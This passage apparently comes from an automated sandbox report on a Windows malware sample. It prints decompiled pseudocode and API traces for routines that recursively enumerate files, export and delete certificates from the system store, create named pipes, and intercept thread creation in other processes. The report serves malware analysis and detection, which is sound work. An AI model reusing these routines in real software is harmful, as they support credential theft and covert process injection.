						_t46 = _v1124.dwFileAttributes >> 0x00000004 & 0x00000001;
						if(_t46 != 0 || PathMatchSpecW( &(_v1124.cFileName), _v1132.ftCreationTime) != 0) {
							PathCombineW( &_v532, _t55,  &(_v1124.cFileName));
							if(_t46 == 0) {
								if(E00410093( &_v540) != 0) {
									_v1140 = _v1140 + 1;
								}
							} else {
								_v1140 = _v1140 + E0040B844( &_v540, _v1136);
							}
						}
					}
					goto L11;
				} else {
					FindClose(_t52);
					goto L13;
				}
			}
















        0x0040b858
        0x0040b863
        0x0040b867
        0x0040b87a
        0x0040b880
        0x0040b885
        0x0040b88a
        0x0040b92d
        0x0040b937
        0x00000000
        0x00000000
        0x00000000
        0x0040b912
        0x0040b920
        0x0040b890
        0x0040b896
        0x0040b8b7
        0x0040b8ba
        0x0040b8dd
        0x0040b8e5
        0x0040b90c
        0x0040b90e
        0x0040b90e
        0x0040b8e7
        0x0040b8f7
        0x0040b8f7
        0x0040b8e5
        0x0040b8ba
        0x00000000
        0x0040b926
        0x0040b927
        0x00000000
        0x0040b927

        APIs
        • PathCombineW.SHLWAPI(?,?,00401040,00000000,00000000,00000000), ref: 0040B867
        • FindFirstFileW.KERNEL32(?,?), ref: 0040B87A
        • PathMatchSpecW.SHLWAPI(?,?), ref: 0040B8C5
        • PathCombineW.SHLWAPI(?,?,0000002E), ref: 0040B8DD
        • FindNextFileW.KERNEL32(00000000,?,?), ref: 0040B918
        • FindClose.KERNEL32(00000000), ref: 0040B927
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: FindPath$CombineFile$CloseFirstMatchNextSpec
        • String ID: .$.
        • API String ID: 1774936002-3769392785
        • Opcode ID: b956afc0356955967d343f1ebfaf1049d9eae8e1cd98d0a29cf0e167369ee4e2
        • Instruction ID: c3e786bcb6ffdbd1f438587dbf56f233dd10973e367638bbf7211b59f00e0d71
        • Opcode Fuzzy Hash: b956afc0356955967d343f1ebfaf1049d9eae8e1cd98d0a29cf0e167369ee4e2
        • Instruction Fuzzy Hash: 802194725083459BD720EF60D848AAB77FCFBC1314F04893EF68492290E7799949D79E
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004045A1, Relevance: 13.6, APIs: 9, Instructions: 108encryptiontimeCOMMON
        Download Yara Rule
        APIs
        • CertOpenSystemStoreW.CRYPT32(00000000,?), ref: 004045BA
        • PFXExportCertStore.CRYPT32(00000000,?,?,00000004), ref: 004045E5
        • PFXExportCertStore.CRYPT32(00000000,?,?,00000004), ref: 0040463D
        • GetSystemTime.KERNEL32(?), ref: 00404650
        • wnsprintfW.SHLWAPI ref: 0040467D
        • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 004046C4
          • Part of subcall function 0040F14B: RtlAllocateHeap.NTDLL(00000008,?,0040ACF9), ref: 0040F157
        • CertDuplicateCertificateContext.CRYPT32(00000000), ref: 004046B1
        • CertDeleteCRLFromStore.CRYPT32(00000000), ref: 004046BC
        • CertCloseStore.CRYPT32(00000000,00000000), ref: 004046DB
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Cert$Store$ExportSystem$AllocateCertificateCertificatesCloseContextDeleteDuplicateEnumFromHeapOpenTimewnsprintf
        • String ID:
        • API String ID: 2815783250-0
        • Opcode ID: d90b26ffe156d922ba95be207a60cd5771ababca73f5265f8ad747cf719d2de6
        • Instruction ID: fd37fcfeaa2d01de16add8b94f785360a174619a332df0d8a392818a1b52e0cd
        • Opcode Fuzzy Hash: d90b26ffe156d922ba95be207a60cd5771ababca73f5265f8ad747cf719d2de6
        • Instruction Fuzzy Hash: F931A3B1504305AFC7109F65DC44DAB7BE8EBC9714F008D3AFA55E2290E77AC914CBAA
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00413682, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON
        Download Yara Rule
        C-Code - Quality: 92%
        			E00413682(WCHAR* __ecx, intOrPtr __edx, unsigned int _a4) {
				short _v524;
				short _v528;
				short _v532;
				char _v536;
				short _v1076;
				struct _WIN32_FIND_DATAW _v1124;
				intOrPtr _v1128;
				void* _v1132;
				intOrPtr _v1140;
				int _t37;
				int _t48;
				signed short _t56;
				int _t59;
				signed int _t72;
				void* _t82;
				unsigned int _t87;
				signed int _t88;
				void* _t90;

				_t90 = (_t88 & 0xfffffff8) - 0x464;
				_v1128 = __edx;
				_v1124.ftCreationTime = __ecx;
				PathCombineW( &_v524, __ecx, "*");
				_t37 = FindFirstFileW( &_v532,  &_v1124);
				_v1132 = _t37;
				if(_t37 == 0xffffffff) {
					L12:
					return _t37;
				}
				_t87 = _a4;
				do {
					if(E004100B1( &(_v1124.cFileName)) == 0) {
						_push(_v1124.dwFileAttributes);
						_t48 = wnsprintfW(_t90 + 0x280 + _t87 * 2, 0x103 - _t87, L"%s\t\tsize:%I64u attr:0x%08X\r\n",  &(_v1124.cFileName), _v1124.nFileSizeLow, _v1124.nFileSizeHigh);
						_t77 = _t48;
						_t90 = _t90 + 0x1c;
						if(_t48 > 0) {
							if(_t87 > 0) {
								_t56 = 0x20;
								_t72 = _t87 >> 1;
								_t82 =  &_v528;
								_t59 = memset(_t82, _t56 & 0x0000ffff | (_t56 & 0x0000ffff) << 0x00000010, _t72 << 2);
								asm("adc ecx, ecx");
								memset(_t82 + _t72, _t59, 0);
								_t90 = _t90 + 0x18;
							}
							E0040F2F3(_t77 + _t87, _v1132,  &_v528);
						}
						if(_t87 < 0xc8 && (_v1124.ftCreationTime & 0x00000010) != 0) {
							PathCombineW( &_v528, _v1124,  &_v1076);
							_t28 = _t87 + 1; // 0x1
							E00413682( &_v536, _v1140, _t28);
						}
					}
				} while (FindNextFileW(_v1132,  &_v1124) != 0);
				_t37 = FindClose(_v1132);
				goto L12;
			}





















        0x00413688
        0x0041369f
        0x004136a3
        0x004136a7
        0x004136ba
        0x004136c0
        0x004136c7
        0x004137b2
        0x004137b8
        0x004137b8
        0x004136cd
        0x004136d0
        0x004136db
        0x004136e1
        0x00413711
        0x00413717
        0x00413719
        0x0041371e
        0x00413722
        0x00413726
        0x00413733
        0x00413735
        0x0041373c
        0x0041373e
        0x00413740
        0x00413740
        0x00413740
        0x00413752
        0x00413752
        0x0041375d
        0x00413777
        0x00413781
        0x0041378c
        0x0041378c
        0x0041375d
        0x004137a0
        0x004137ac
        0x00000000

        APIs
        • PathCombineW.SHLWAPI(?,?,00401040,?,?,00000000), ref: 004136A7
        • FindFirstFileW.KERNEL32(?,?,?,00000000), ref: 004136BA
        • wnsprintfW.SHLWAPI ref: 00413711
        • PathCombineW.SHLWAPI(?,00000010,?), ref: 00413777
        • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 0041379A
        • FindClose.KERNEL32(?,?,00000000), ref: 004137AC
        Strings
        • %ssize:%I64u attr:0x%08X, xrefs: 00413703
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Find$CombineFilePath$CloseFirstNextwnsprintf
        • String ID: %ssize:%I64u attr:0x%08X
        • API String ID: 3066209975-1641620506
        • Opcode ID: f3acad4001cce5c42a6fae5ae3653cd98d07216831b79fbe0a06b5b2cad4f11f
        • Instruction ID: 9c89af99221d499cee9ec74ede5d7c57bbfe5246a40bddb671b3e6b8ee2927d1
        • Opcode Fuzzy Hash: f3acad4001cce5c42a6fae5ae3653cd98d07216831b79fbe0a06b5b2cad4f11f
        • Instruction Fuzzy Hash: 4831A3B1508305ABC720DF54D888ADBBBE8FBC4314F108A3EF595C22A1E735DA49C799
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00413853, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 92filesynchronizationCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00413853() {
				char _v5;
				struct _WIN32_FIND_DATAW _v604;
				short _v1124;
				void* __esi;
				void* _t23;
				void* _t25;
				intOrPtr _t28;
				void* _t29;
				intOrPtr _t30;
				intOrPtr _t32;
				int _t35;
				void* _t44;

				_v5 = 0;
				E00413832( &_v1124);
				_t23 = FindFirstFileW( &_v1124,  &_v604);
				if(_t23 == 0xffffffff) {
					L5:
					_t25 = FindFirstFileW(0x4153a8,  &_v604);
					__eflags = _t25 - 0xffffffff;
					if(_t25 == 0xffffffff) {
						L16:
						return _v5;
					}
					FindClose(_t25);
					__eflags = _v604.nFileSizeLow;
					if(_v604.nFileSizeLow > 0) {
						L8:
						_t28 =  *0x414ad4; // 0x241f5a8
						_t29 = CreateMutexW(0x4155b4, 0,  *(_t28 + 0x20));
						__eflags = _t29;
						if(_t29 == 0) {
							_t44 = 0;
							__eflags = 0;
						} else {
							_t44 = E00411693(_t29);
						}
						_t30 =  *0x414ad4; // 0x241f5a8
						E0040AA33(__eflags,  *((intOrPtr*)(_t30 + 0x2c)), 8, 0, 0, 0, 0);
						__eflags = _v604.nFileSizeHigh;
						if(_v604.nFileSizeHigh <= 0) {
							__eflags = _v604.nFileSizeLow;
							if(__eflags > 0) {
								_t35 = MoveFileExW(0x4153a8,  &_v1124, 3);
								__eflags = _t35;
								_t16 =  &_v5;
								 *_t16 = _t35 != 0;
								__eflags =  *_t16;
							}
						} else {
							E00410093(0x4153a8);
						}
						_t32 =  *0x414ad4; // 0x241f5a8
						E0040AA33(__eflags,  *((intOrPtr*)(_t32 + 0x2c)), 7, 0, 0, 0, 0);
						E004116B4(_t44);
						goto L16;
					}
					__eflags = _v604.nFileSizeHigh;
					if(_v604.nFileSizeHigh <= 0) {
						goto L16;
					}
					goto L8;
				}
				FindClose(_t23);
				if(_v604.nFileSizeLow <= 0 || _v604.nFileSizeHigh != 0) {
					E00410093( &_v1124);
					goto L5;
				} else {
					return 1;
				}
			}















        0x00413868
        0x0041386b
        0x0041387e
        0x00413887
        0x004138b3
        0x004138c0
        0x004138c6
        0x004138c9
        0x00413965
        0x00000000
        0x00413965
        0x004138d0
        0x004138d6
        0x004138dc
        0x004138e6
        0x004138e6
        0x004138f4
        0x004138fa
        0x004138fc
        0x00413909
        0x00413909
        0x004138fe
        0x00413905
        0x00413905
        0x0041390b
        0x00413919
        0x0041391e
        0x00413924
        0x0041392e
        0x00413934
        0x00413940
        0x00413946
        0x00413948
        0x00413948
        0x00413948
        0x00413948
        0x00413926
        0x00413927
        0x00413927
        0x0041394c
        0x0041395a
        0x00413960
        0x00000000
        0x00413960
        0x004138de
        0x004138e4
        0x00000000
        0x00000000
        0x00000000
        0x004138e4
        0x0041388a
        0x00413896
        0x004138ae
        0x00000000
        0x004138a0
        0x00000000
        0x004138a0

        APIs
          • Part of subcall function 00413832: lstrcpyW.KERNEL32(00413B91,yNameW), ref: 0041383B
          • Part of subcall function 00413832: lstrcatW.KERNEL32(?,.lll), ref: 0041384A
        • FindFirstFileW.KERNEL32(?,?,?,?,?,?), ref: 0041387E
        • FindClose.KERNEL32(00000000,?,?,?), ref: 0041388A
        • FindFirstFileW.KERNEL32(yNameW,?,?,?,?), ref: 004138C0
        • FindClose.KERNEL32(00000000,?,?,?), ref: 004138D0
        • CreateMutexW.KERNEL32(004155B4,00000000,?,?,?,?), ref: 004138F4
        • MoveFileExW.KERNEL32(yNameW,?,00000003,?,00000008,00000000,00000000,00000000,00000000,?,?,?), ref: 00413940
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Find$File$CloseFirst$CreateMoveMutexlstrcatlstrcpy
        • String ID: yNameW
        • API String ID: 1879962031-1413253154
        • Opcode ID: 07bd54145fe5566cafbee39e8d060eba32512a952d47c92bf35e091e3048867c
        • Instruction ID: 931c6ab978c3d625ae84c42c74c39e2681070810f353003ab9610356990fe827
        • Opcode Fuzzy Hash: 07bd54145fe5566cafbee39e8d060eba32512a952d47c92bf35e091e3048867c
        • Instruction Fuzzy Hash: D73195B1904218AFDB20AFA49C88EEA777CEB4535AF1441B6F204A2150D7788EC5CF2D
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004101CA, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 53encryptionCOMMON
        Download Yara Rule
        APIs
        • CryptAcquireContextW.ADVAPI32(#A,00000000,00000000,00000001,F0000040,?,0041230D,00000000,?,-0000001C,00000000,?,?,?), ref: 004101E3
        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 004101FB
        • CryptHashData.ADVAPI32(?,00000010), ref: 00410216
        • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 0041022D
        • CryptDestroyHash.ADVAPI32(?), ref: 00410244
        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0041024E
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
        • String ID: #A
        • API String ID: 3186506766-1223380006
        • Opcode ID: 00a6c52fb03e762d6cde56b31b48124ae83125e29fb3e6f27cc1ef7cd2f09006
        • Instruction ID: 35969718400f338c5366b7488e5c9e99425ca204b7f732ea1e5b2f1fd4e536e4
        • Opcode Fuzzy Hash: 00a6c52fb03e762d6cde56b31b48124ae83125e29fb3e6f27cc1ef7cd2f09006
        • Instruction Fuzzy Hash: 81113C75A0420CBFEF114F90DC48FEE7B7CEB44344F0080A5B511A11A0D7B5DE949B28
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040A8E2, Relevance: 12.1, APIs: 8, Instructions: 74memorysynchronizationpipeCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0040A8E2(void* __ecx, void* __eflags, void* _a4, intOrPtr _a8) {
				short _v524;
				void* __edi;
				void* _t19;
				void* _t33;
				void** _t36;

				_t33 = __ecx;
				E0040A739( &_v524, _a8);
				_t36 = RtlAllocateHeap( *0x415fa8, 8, 0x18);
				if(_t36 != 0) {
					_t19 = CreateNamedPipeW( &_v524, 3, 6, 0xff, 0x200, 0x200, 0, 0);
					 *_t36 = _t19;
					if(_t19 != 0xffffffff) {
						_t36[1] = CreateEventW(0, 0, 0, 0);
						_t36[2] = CreateEventW(0, 0, 0, 0);
						_t36[3] = _a4;
						_t36[4] = E0040F2C5(_a8);
						if(E0040B81A(_t33, E0040A75A, _t36) != 0) {
							WaitForSingleObject(_t36[2], 0xffffffff);
							return _t36;
						}
						CloseHandle( *_t36);
						CloseHandle(_t36[1]);
						CloseHandle(_t36[2]);
						E0040F15E(_t36[4]);
					}
					E0040F15E(_t36);
				}
				return 0;
			}








        0x0040a8e2
        0x0040a8f6
        0x0040a90b
        0x0040a911
        0x0040a933
        0x0040a939
        0x0040a93e
        0x0040a956
        0x0040a962
        0x0040a968
        0x0040a976
        0x0040a980
        0x0040a9ab
        0x00000000
        0x0040a9b1
        0x0040a984
        0x0040a98d
        0x0040a996
        0x0040a99f
        0x0040a99f
        0x0040a941
        0x0040a941
        0x00000000

        APIs
          • Part of subcall function 0040A739: lstrcpyW.KERNEL32(?,\\.\pipe\), ref: 0040A742
          • Part of subcall function 0040A739: lstrcpyW.KERNEL32(?,?), ref: 0040A750
        • RtlAllocateHeap.NTDLL(00000008,00000018,?), ref: 0040A905
        • CreateNamedPipeW.KERNEL32(?,00000003,00000006,000000FF,00000200,00000200,00000000,00000000,?,00000001), ref: 0040A933
        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,00000001), ref: 0040A94C
        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,00000001), ref: 0040A959
          • Part of subcall function 0040B81A: CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0040B830
          • Part of subcall function 0040B81A: CloseHandle.KERNEL32(00000000,?,?,0040C445,0040BFC9,00000000,?,00000000), ref: 0040B837
        • CloseHandle.KERNEL32(00000000,0040A75A,00000000,?,00000001), ref: 0040A984
        • CloseHandle.KERNEL32(?,?,00000001), ref: 0040A98D
        • CloseHandle.KERNEL32(?,?,00000001), ref: 0040A996
          • Part of subcall function 0040F15E: HeapFree.KERNEL32(00000000,00000000,0040AD5B,00000000,00000001), ref: 0040F171
        • WaitForSingleObject.KERNEL32(?,000000FF,0040A75A,00000000,?,00000001), ref: 0040A9AB
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CloseCreateHandle$EventHeaplstrcpy$AllocateFreeNamedObjectPipeSingleThreadWait
        • String ID:
        • API String ID: 2368775089-0
        • Opcode ID: 6f55b3798b19828938dc2897af5193de2d16021014fcad48b99956fff55a9570
        • Instruction ID: b7952648af3abff7b2ed77cb7fe79ab135b3af259b6d59398858e083c9db8725
        • Opcode Fuzzy Hash: 6f55b3798b19828938dc2897af5193de2d16021014fcad48b99956fff55a9570
        • Instruction Fuzzy Hash: D021B035600300ABCB316F22DC0CE9B7AB8EBC1B10F00C93AF566E26E0D73499158B69
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00411DB9, Relevance: 9.1, APIs: 6, Instructions: 79fileCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00411DB9(void* __ecx, intOrPtr* __edx, WCHAR* _a4, WCHAR* _a8, signed int _a12) {
				short _v540;
				char _v548;
				short _v1044;
				short _v1052;
				char _v1068;
				struct _WIN32_FIND_DATAW _v1644;
				signed char _v1660;
				void* __esi;
				int _t25;
				void* _t46;
				intOrPtr* _t52;
				void* _t55;

				_t52 = __edx;
				_t55 = __ecx;
				_t25 = PathCombineW( &_v1044, _a4, "*");
				if(_t25 == 0) {
					L12:
					return _t25;
				}
				_t25 = FindFirstFileW( &_v1052,  &_v1644);
				_t46 = _t25;
				if(_t46 == 0xffffffff) {
					goto L12;
				} else {
					goto L2;
				}
				do {
					L2:
					if(E004100B1( &(_v1644.cFileName)) == 0 && PathCombineW( &_v1052, _a4,  &(_v1644.cFileName)) != 0 && PathCombineW( &_v540, _a8,  &(_v1644.dwReserved0)) != 0) {
						if((_v1660 & 0x00000010) == 0) {
							if(E00411CE0(_t55,  &_v1068,  &_v548) != 0) {
								 *_t52 =  *_t52 + 1;
							}
						} else {
							if((_a12 & 0x00000001) != 0) {
								E00411DB9(_t55, _t52,  &_v1068,  &_v548, _a12);
							}
						}
					}
				} while (FindNextFileW(_t46,  &_v1644) != 0);
				_t25 = FindClose(_t46);
				goto L12;
			}















        0x00411dd8
        0x00411dda
        0x00411ddc
        0x00411de4
        0x00411eaa
        0x00411eb0
        0x00411eb0
        0x00411df7
        0x00411dfd
        0x00411e02
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00411e08
        0x00411e08
        0x00411e13
        0x00411e4e
        0x00411e8b
        0x00411e8d
        0x00411e8d
        0x00411e50
        0x00411e54
        0x00411e6d
        0x00411e6d
        0x00411e54
        0x00411e4e
        0x00411e9b
        0x00411ea4
        0x00000000

        APIs
        • PathCombineW.SHLWAPI(?,00000001,00401040,00000000,00000000,00000000), ref: 00411DDC
        • FindFirstFileW.KERNEL32(?,?), ref: 00411DF7
        • PathCombineW.SHLWAPI(?,00000001,?), ref: 00411E25
        • PathCombineW.SHLWAPI(?,?,?), ref: 00411E3F
        • FindNextFileW.KERNEL32(00000000,?), ref: 00411E95
        • FindClose.KERNEL32(00000000), ref: 00411EA4
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CombineFindPath$File$CloseFirstNext
        • String ID:
        • API String ID: 3830188700-0
        • Opcode ID: 4c3b9b2fc2458e3a01db5007611ae2cfb662d99a9101dc5719992494ed13cedb
        • Instruction ID: 2e1df9b30b25fa82e1198b53c7c9e1d36ee149c73f041ff653760e15d8918ea3
        • Opcode Fuzzy Hash: 4c3b9b2fc2458e3a01db5007611ae2cfb662d99a9101dc5719992494ed13cedb
        • Instruction Fuzzy Hash: 90219172108349ABCB20DFA1DC48EEB77ECAF84344F004A2BBE54C2160EB75D599C75A
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00407BE9, Relevance: 9.1, APIs: 6, Instructions: 67threadnativeprocessCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00407BE9(CONTEXT* __ebx, void* __edi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, void* _a20, struct _EXCEPTION_RECORD _a24, struct _PROCESS_PARAMETERS _a28, char _a32) {
				long _v8;
				intOrPtr _v16;
				intOrPtr _v28;
				void _v32;
				intOrPtr _v48;
				void* _v60;
				void* _t29;
				int _t33;
				CONTEXT* _t37;
				void* _t40;

				_t37 = __ebx;
				if(NtQueryInformationProcess(_a20, 0,  &_v32, 0x18,  &_v8) != 0 || _v28 == 0) {
					L13:
					return NtCreateThread(_a8, _a12, _a16, _a20, _a24, _t37, _a28, _a32);
				} else {
					_v8 = 0;
					if(_v16 == 0) {
						L11:
						_t29 = E00407665(_a20);
						if(_t29 != 0) {
							 *((intOrPtr*)(_t37 + 0xb0)) = _t29 + _a4;
						}
						goto L13;
					}
					_t40 = CreateToolhelp32Snapshot(4, 0);
					if(_t40 == 0) {
						L10:
						if(_v8 != 0) {
							goto L13;
						}
						goto L11;
					}
					_v60 = 0x1c;
					_t33 = Thread32First(_t40,  &_v60);
					while(_t33 != 0) {
						if(_v48 == _v16) {
							_v8 = _v8 + 1;
						}
						_t33 = Thread32Next(_t40,  &_v60);
					}
					CloseHandle(_t40);
					goto L10;
				}
			}













        0x00407be9
        0x00407c08
        0x00407c79
        0x00407c97
        0x00407c0f
        0x00407c0f
        0x00407c15
        0x00407c62
        0x00407c65
        0x00407c6c
        0x00407c73
        0x00407c73
        0x00000000
        0x00407c6c
        0x00407c21
        0x00407c25
        0x00407c5c
        0x00407c60
        0x00000000
        0x00000000
        0x00000000
        0x00407c60
        0x00407c2c
        0x00407c33
        0x00407c51
        0x00407c41
        0x00407c43
        0x00407c43
        0x00407c4b
        0x00407c4b
        0x00407c56
        0x00000000
        0x00407c56

        APIs
        • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 00407C00
        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00407C1B
        • Thread32First.KERNEL32(00000000,?), ref: 00407C33
        • Thread32Next.KERNEL32(00000000,0000001C), ref: 00407C4B
        • CloseHandle.KERNEL32(00000000), ref: 00407C56
        • NtCreateThread.NTDLL(?,?,?,?,?,?,?,?), ref: 00407C8F
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CreateThread32$CloseFirstHandleInformationNextProcessQuerySnapshotThreadToolhelp32
        • String ID:
        • API String ID: 1144773994-0
        • Opcode ID: 6a6e617b322aab2b58d9897f0f92ea16a33ddaf7694e75928d30f8990438f251
        • Instruction ID: 1ad56231f162078d763af7627e4c73ba5b9e3adc2c51b843d29e235836c985fe
        • Opcode Fuzzy Hash: 6a6e617b322aab2b58d9897f0f92ea16a33ddaf7694e75928d30f8990438f251
        • Instruction Fuzzy Hash: 75214D71908109EBDF119FA1DC48EEF7B79FF44744F008036F905A1150D735A951DBA5
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00407F27, Relevance: 9.1, APIs: 6, Instructions: 59fileCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00407F27(void* __ecx, void* __edx, void* __eflags, signed int _a8) {
				short _v524;
				char _v532;
				short _v1072;
				struct _WIN32_FIND_DATAW _v1120;
				short _v1636;
				short _v1640;
				void* _t23;
				int _t27;
				void* _t35;
				void* _t36;
				WCHAR* _t38;
				void* _t39;

				_t36 = __edx;
				_t35 = __ecx;
				_t14 = _a8;
				_t38 = E0040F5EA(_a8 | 0xffffffff,  *_t14);
				if(_t38 != 0) {
					ExpandEnvironmentStringsW(_t38,  &_v1636, 0x103);
					E0040F15E(_t38);
					_t39 = FindFirstFileW( &_v1640,  &_v1120);
					__eflags = _t39;
					if(_t39 != 0) {
						PathRemoveFileSpecW( &_v1636);
						do {
							__eflags = _v1120.ftCreationTime.dwFileAttributes & 0x00000010;
							if(__eflags == 0) {
								PathCombineW( &_v524,  &_v1636,  &_v1072);
								E00413599(_t35, _t36, __eflags,  &_v532, 0,  &_v532);
							}
							_t27 = FindNextFileW(_t39,  &(_v1120.ftCreationTime));
							__eflags = _t27;
						} while (_t27 != 0);
						FindClose(_t39);
					}
					_t23 = 1;
				} else {
					_t23 = 0;
				}
				return _t23;
			}















        0x00407f27
        0x00407f27
        0x00407f2d
        0x00407f41
        0x00407f45
        0x00407f59
        0x00407f60
        0x00407f78
        0x00407f7a
        0x00407f7c
        0x00407f83
        0x00407f89
        0x00407f89
        0x00407f91
        0x00407fa8
        0x00407fb9
        0x00407fb9
        0x00407fc7
        0x00407fcd
        0x00407fcd
        0x00407fd2
        0x00407fd2
        0x00407fd8
        0x00407f47
        0x00407f47
        0x00407f47
        0x00407fde

        APIs
        • ExpandEnvironmentStringsW.KERNEL32(00000000,00000103,00000103,?), ref: 00407F59
        • FindFirstFileW.KERNEL32(?,?,00000000), ref: 00407F72
        • PathRemoveFileSpecW.SHLWAPI(?), ref: 00407F83
        • PathCombineW.SHLWAPI(?,?,?), ref: 00407FA8
        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00407FC7
        • FindClose.KERNEL32(00000000), ref: 00407FD2
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: FileFind$Path$CloseCombineEnvironmentExpandFirstNextRemoveSpecStrings
        • String ID:
        • API String ID: 3464319278-0
        • Opcode ID: 26ccd842fb8647def088d114041e1cb72f7b8454cc91e184369bab8dced5ebda
        • Instruction ID: 7b424616c19bbf423e2e416058e0e9d47113851a515604c9ea99cd79c550aa44
        • Opcode Fuzzy Hash: 26ccd842fb8647def088d114041e1cb72f7b8454cc91e184369bab8dced5ebda
        • Instruction Fuzzy Hash: 511194728092096BC331DBA0CC48EDB77DCAF45310F008A3AF954D3180EB78EA0487AA
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040B6B3, Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0040B6B3() {
				intOrPtr _t3;
				intOrPtr _t8;
				long _t12;
				struct HWINSTA__* _t13;
				struct HDESK__* _t15;

				_t3 =  *0x414ad4; // 0x241f5a8
				_t12 = 0;
				_t13 = OpenWindowStationA( *(_t3 + 0x78), 0, 0x10000000);
				if(_t13 != 0) {
					if(SetProcessWindowStation(_t13) != 0) {
						_t8 =  *0x414ad4; // 0x241f5a8
						_t15 = OpenDesktopA( *(_t8 + 0x7c), 0, 0, 0x10000000);
						if(_t15 != 0) {
							SetThreadDesktop(_t15);
							_t12 = 1;
							CloseDesktop(_t15);
						}
					}
					CloseWindowStation(_t13);
				}
				return _t12;
			}








        0x0040b6b3
        0x0040b6c1
        0x0040b6cd
        0x0040b6d1
        0x0040b6dc
        0x0040b6de
        0x0040b6ef
        0x0040b6f3
        0x0040b6f6
        0x0040b6fd
        0x0040b6ff
        0x0040b6ff
        0x0040b6f3
        0x0040b706
        0x0040b706
        0x0040b711

        APIs
        • OpenWindowStationA.USER32(?,00000000,10000000), ref: 0040B6C7
        • SetProcessWindowStation.USER32(00000000), ref: 0040B6D4
        • OpenDesktopA.USER32(?,00000000,00000000,10000000), ref: 0040B6E9
        • SetThreadDesktop.USER32(00000000), ref: 0040B6F6
        • CloseDesktop.USER32(00000000), ref: 0040B6FF
        • CloseWindowStation.USER32(00000000), ref: 0040B706
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: DesktopStationWindow$CloseOpen$ProcessThread
        • String ID:
        • API String ID: 2658375134-0
        • Opcode ID: 793ef29611ea4294420e94f81890e73a71ba9eac8b95574a29606d2867495125
        • Instruction ID: 9223afcdfaa37a91e713c2f587de49640207d50e06809ef103f05dd7ef9f79ac
        • Opcode Fuzzy Hash: 793ef29611ea4294420e94f81890e73a71ba9eac8b95574a29606d2867495125
        • Instruction Fuzzy Hash: 73F0BD72191025AFD7116BA4ACC8DEB3BACEFC93E23174076F51193520D7654C119BAC
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00412CCE, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195COMMON
        Download Yara Rule
        C-Code - Quality: 74%
        			E00412CCE(signed int* __esi, signed int _a4) {
				signed int _v12;
				char _v13;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				short _v72;
				signed short _v74;
				signed short _v76;
				signed short _v78;
				signed short _v80;
				signed char _v86;
				signed int _v88;
				signed short _v90;
				signed short _v92;
				char _v288;
				struct _OSVERSIONINFOW _v368;
				short _v600;
				void* __ebx;
				void* __edi;
				signed int _t73;
				signed int _t76;
				signed int _t77;
				intOrPtr _t117;
				signed int _t124;
				signed int _t126;
				intOrPtr _t138;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				signed int* _t147;
				void* _t148;

				_t147 = __esi;
				_t126 = 1;
				_v13 = 0;
				if( *__esi == 0) {
					_t124 = E00412322();
					 *__esi = _t124;
					if(_t124 == 0) {
						return 0;
					}
					_v13 = 1;
				}
				__eflags = _a4 & 0x00000001;
				if((_a4 & 0x00000001) == 0) {
					L9:
